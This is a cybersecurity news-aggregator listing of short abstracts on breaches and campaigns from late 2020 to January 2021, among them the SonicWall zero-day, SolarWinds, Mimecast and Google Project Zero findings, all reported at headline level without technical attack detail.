SonicWall firewall maker hacked using zero-day in its VPN device Full Text
Abstract
Security hardware manufacturer SonicWall has issued an urgent security notice about threat actors exploiting a zero-day vulnerability in their VPN products to perform attacks on their internal systems.BleepingComputer
January 23, 2021
SonicWall firewall maker attacked using zero-day in its VPN device Full Text
Abstract
Security hardware manufacturer SonicWall has issued an urgent security notice about threat actors exploiting a zero-day vulnerability in their VPN products to perform attacks on their internal systems.BleepingComputer
January 23, 2021
Security firm SonicWall was victim of a coordinated attack Full Text
Abstract
The Hacker News reported in an exclusive that the security firm SonicWall was hacked as a result of a coordinated attack on its internal systems. TheHackerNews revealed in an exclusive that the security provider SonicWall was hacked on Friday. The... Security Affairs
January 22, 2021
MyFreeCams site hacked to steal info of 2 million paying users Full Text
Abstract
A hacker is selling a database with login details for two million high-paying users of the MyFreeCams adult video streaming and chat service.BleepingComputer
January 22, 2021
MyFreeCams Hacked: 2 Million User Records Sold Online Full Text
Abstract
The data was allegedly exfiltrated from the company servers in December 2020 by carrying out an SQL injection attack, and includes 2 million user records of MyFreeCams Premium members.Cyber News
January 21, 2021
CHwapi hospital hit by Windows BitLocker encryption cyberattack Full Text
Abstract
The CHwapi hospital in Belgium is suffering from a cyberattack where threat actors claim to have encrypted 40 servers and 100 TB of data using Windows Bitlocker.BleepingComputer
January 21, 2021
Microsoft Releases New Info on SolarWinds Attack Chain Full Text
Abstract
More than one month after the SolarWinds breach that impacted numerous organizations was first uncovered, new details of the sophisticated operation continue to trickle out.Dark Reading
January 20, 2021
Bot ‘FreakOut’ leverages three critical vulnerabilities to attack Linux systems Full Text
Abstract
Based on the malware features, the researchers said the attackers use the compromised systems for further attacks, spreading laterally across the victim company’s network, or launching attacks on outside targets while masquerading as the compromised company.SCMagazine
January 20, 2021
Malwarebytes Hit by SolarWinds Attackers Full Text
Abstract
The attack vector was not the Orion platform but rather an email-protection application for Microsoft 365.Threatpost
January 19, 2021
Atlanta Synagogue Reports Cyber-Attack Full Text
Abstract
Annual Martin Luther King Jr. Shabbat service disrupted by “malicious user agents”. Infosecurity Magazine
January 19, 2021
Livecoin crypto exchange shuts down after losing domain to hackers Full Text
Abstract
Livecoin has announced shutting down its operations, after becoming the victim of an alleged “carefully planned attack” that halted its operations temporarily on December 24, 2020. Hackread
January 18, 2021
A Sophisticated Windows and Android Hacking Operation Using Zero-Day Exploits Full Text
Abstract
Google experts unveiled an attack campaign purportedly by a sophisticated hacking group targeting Windows and Android users with zero-day and n-day exploits.Cyware Alerts - Hacker News
January 18, 2021
FBI warns of vishing attacks stealing corporate accounts Full Text
Abstract
The Federal Bureau of Investigation (FBI) has issued a notification warning of ongoing vishing attacks attempting to steal corporate accounts and credentials for network access and privilege escalation from US and international-based employees.BleepingComputer
January 16, 2021
xHunt Campaign Adopts New Enhancements to Evade Detection Full Text
Abstract
A sophisticated group is using a webshell called BumbleBee in an ongoing xHunt campaign targeting Microsoft Exchange servers at Kuwaiti organizations.Cyware Alerts - Hacker News
January 14, 2021
CISA says multiple attacks on cloud services bypassed multifactor authentication Full Text
Abstract
Threat actors have used a variety of tactics and techniques—including phishing, brute force login attempts, and possibly a so-called “pass-the-cookie” attack that bypassed multifactor authentication to exploit cloud security weaknesses.SCMagazine
January 13, 2021
Google discloses hacking campaign targeting Windows, Android users Full Text
Abstract
Project Zero, Google's 0day bug-hunting team, revealed a hacking campaign coordinated by "a highly sophisticated actor" and targeting Windows and Android users with zero-day and n-day exploits.BleepingComputer
January 13, 2021
Mimecast Cert Abused to Target Inboxes in “Sophisticated” Attack Full Text
Abstract
Security vendor says attackers used it to access Microsoft 365 accounts. Infosecurity Magazine
January 13, 2021
Project Zero Discovers Exploits via Watering Hole Attacks Full Text
Abstract
Researchers discovered two exploit servers delivering different exploit chains via watering hole attacks. One server targeted Windows users, the other targeted Android devices.Google Project Zero
January 13, 2021
Google reveals sophisticated Windows and Android hacking operation Full Text
Abstract
Google published a six-part report today detailing a sophisticated hacking operation that the company detected in early 2020 and which targeted owners of both Android and Windows devices.ZDNet
January 12, 2021
Sophisticated hacking campaign uses Windows and Android zero-days Full Text
Abstract
Google Project Zero researchers uncovered a sophisticated hacking campaign that targeted Windows and Android users. The Google Project Zero team has recently launched an initiative aimed at devising new techniques to detect 0-day exploits employed...Security Affairs
January 12, 2021
Colombian Energy, Metal Firms Under Attack in New Cyberespionage Campaign Full Text
Abstract
A wave of attacks against companies in Colombia uses a trio of RATs to steal confidential, sensitive data. The campaign, dubbed Operation Spalax, was revealed by ESET researchers on Tuesday. ZDNet
January 12, 2021
Mimecast discloses Microsoft 365 SSL certificate compromise Full Text
Abstract
Email security company Mimecast has disclosed today that a "sophisticated threat actor" compromised one of the certificates the company issues for customers to securely connect Microsoft 365 Exchange to their services.BleepingComputer
January 10, 2021
New Zealand central bank hit by a cyber attack Full Text
Abstract
A cyber attack hit the New Zealand central bank; sensitive information has been potentially accessed by the intruders. The New Zealand central bank announced today that a cyber attack hit its infrastructure. According to the Government organization,... Security Affairs
January 8, 2021
New Attack Could Let Hackers Clone Your Google Titan 2FA Security Keys Full Text
Abstract
Hardware security keys—such as those from Google and Yubico—are considered the most secure means to protect accounts from phishing and takeover attacks. But new research published on Thursday demonstrates how an adversary in possession of such a two-factor authentication (2FA) device can clone it by exploiting an electromagnetic side-channel in the chip embedded in it. The vulnerability (tracked as CVE-2021-3011) allows the bad actor to extract the encryption key or the ECDSA private key linked to a victim's account from a FIDO Universal 2nd Factor (U2F) device like Google Titan Key or YubiKey, thus completely undermining the 2FA protections. "The adversary can sign in to the victim's application account without the U2F device, and without the victim noticing," NinjaLab researchers Victor Lomne and Thomas Roche said in a 60-page analysis. "In other words the adversary created a clone of the U2F device for the victim's application account. This cl... The Hacker News
January 7, 2021
TA551: Email Attack Campaign Switches from Valak to IcedID Full Text
Abstract
The recent campaign has targeted German, Italian and Japanese speakers. TA551 has historically pushed different families of information-stealing malware like Ursnif and Valak.Palo Alto Networks
January 6, 2021
SolarWinds hack: Amid hardened security, attackers seek softer targets Full Text
Abstract
Experts disagree that election security efforts detracted from supply chain security. But there are still lessons to be learned.SCMagazine
January 5, 2021
Cyberattacks on Healthcare Spike 45% Since November Full Text
Abstract
The relentless rise in COVID-19 cases is battering already frayed healthcare systems — and ransomware criminals are using the opportunity to strike.Threatpost
January 5, 2021
FBI Warns of Swatting Attacks Full Text
Abstract
Swatting attacks targeting smart-home device users trigger public warning from FBI. Infosecurity Magazine
January 5, 2021
Cyberattacks Against K-12 Schools Expected to Rise in 2021, FBI Warns Full Text
Abstract
With students returning to online classrooms after the holidays, the FBI expects a proliferation of cyber threats targeting K-12 schools and distance learning platforms. Bit Defender
January 5, 2021
Supply Chain Issues Don’t Seem to Go Away Full Text
Abstract
Supply chain attacks have gained a lot of popularity among cybercriminals as inclusion or intrusion in a project can impact plenty of users and go undetected for a long time.Cyware Alerts - Hacker News
January 5, 2021
North Korean software supply chain attack targets stock investors Full Text
Abstract
North Korean hacking group Thallium aka APT37 has been targeting a private stock investment messenger service in a supply chain attack, as reported this week.BleepingComputer
January 5, 2021
Old Attack Method Against Google’s Audio-Based reCAPTCHA Resurrected Full Text
Abstract
An attack method called unCaptcha discovered in 2017 for defeating the audio version of Google’s reCAPTCHA system using speech-to-text services has once again been resurrected.Security Week
January 5, 2021
How to bypass the Google Audio reCAPTCHA with a new version of unCaptcha2 attack Full Text
Abstract
A German security researcher demonstrated how to break, once again, the Google Audio reCAPTCHA with Google's own Speech to Text API. Back in 2017, researchers from the University of Maryland demonstrated an attack method, dubbed unCaptcha, against...Security Affairs
January 4, 2021
Cyber-Attack on US Laboratory Full Text
Abstract
Apex Laboratory discloses summertime cyber-attack. Infosecurity Magazine
December 30, 2020
Antwerp laboratory becomes latest victim of cyber-attack Full Text
Abstract
The attack took place on the General Medical Laboratory (AML) in the Antwerp district of Hoboken. Hackers installed ransomware on the lab’s website, bringing it to a standstill.Brussels Times
December 29, 2020
Finnish Parliament Says Intruders Gained Access to Some MPs’ Email Accounts Full Text
Abstract
In an official statement, KRP Commissioner Tero Muurman said the attack did not cause any damage to the Parliament's internal IT system but was not an accidental intrusion either.ZDNet
December 28, 2020
Scottish Environment Protection Agency targeted in cyberattack Full Text
Abstract
The Scottish Environment Protection Agency (Sepa) has been targeted in a significant cyberattack in the early hours of Christmas Eve, its executive director, David Pirie, confirmed. STV
December 28, 2020
Microsoft Warned CrowdStrike of Possible Hacking Attempt Full Text
Abstract
Microsoft warned CrowdStrike earlier this month of a failed attempt by unidentified attackers to access and read the company's emails, according to a blog post published by the security firm.Info Risk Today